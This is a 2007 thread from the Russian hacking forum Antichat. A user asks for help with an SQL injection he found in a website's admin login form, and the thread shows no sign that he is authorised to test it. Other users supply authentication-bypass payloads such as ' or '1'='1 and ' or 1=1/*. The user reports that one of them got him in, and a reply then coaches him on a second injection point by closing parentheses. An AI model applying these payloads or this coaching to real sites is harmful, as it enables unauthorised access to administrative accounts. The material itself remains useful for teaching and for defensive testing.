Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопрос по скуле! (https://forum.antichat.xyz/showthread.php?t=46987)

fly 18.08.2007 00:22
Вопрос по скуле!
 
Нашел скулю в форме авторизации админа.
В форму ввожу login:admin pass:' , выдает :
Код:
SELECT AId FROM adm_admins WHERE ALogin='admin' AND APassword='''Ошибка выполнения запроса. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1. Выполнение прервано
Что посоветуете? :confused:

.Slip 18.08.2007 00:36
blablabla' or 1=1/*
?:\

[53x]Shadow 18.08.2007 00:42
Цитата:
Сообщение от [sL1p]
blablabla' or 1=1/*
?:\
blablabla' or '1'='1
мона вот так..

fly 18.08.2007 00:57
Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!

[53x]Shadow 18.08.2007 01:02
Цитата:
Сообщение от fly
Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!
Просто не всегда ясно, что там за ковычкой, по-этому сразу отсекать ее не стоит =\

fly 18.08.2007 01:10
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.

[53x]Shadow 18.08.2007 01:31
Цитата:
Сообщение от fly
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.
а в каком параметре или контексте?
скорее всего надо скобки еще просовывать закрывающие и открывающие(либо отсекать реальные закрывающие)..


Время: 10:20